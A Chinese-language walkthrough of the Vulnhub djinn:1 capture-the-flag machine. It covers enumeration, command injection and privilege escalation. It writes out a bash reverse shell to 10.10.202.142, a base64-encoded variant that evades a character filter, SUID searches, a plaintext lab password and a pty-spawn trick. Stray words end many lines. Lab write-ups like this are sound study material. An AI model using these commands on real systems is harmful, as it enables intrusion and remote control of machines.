djinn:1 Vulnhub Walkthrough

靶機下載連接:shell

https://download.vulnhub.com/djinn/djinn.ovabash

 

主機端口掃描:tcp

 

FTP發現一些文件提示編碼

 

1337端口是一個遊戲,去看下server

 

哈哈有點難,暫時放棄,看看7331HTTP server 這邊有麼有發現blog

使用dirb dirsearch 自帶字典沒有發現,加大字段枚舉下目錄遊戲

 

 

命令執行ip

反彈shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直彈不出來,猜想特殊字符作了過濾terminal

base64 編碼執行cmd

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4yMDIuMTQyLzEyMzQgMD4mMQ== | base64 -d | bash

 

接下來進行提權操做

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

內核:Linux djinn 4.15.0-66-generic

exp提權失敗:https://www.exploit-db.com/download/47163

路徑/home/nitish/.dev/creds.txt

nitish:p4ssw0rdStr3r0n9 密碼

切換用戶可能會提示:su: must be run from a terminal

執行此命令:/usr/bin/script -qc /bin/bash /dev/null

 

 

sudo - u sam genie -cmd new

 

 

OVER!!

相關文章
相關標籤/搜索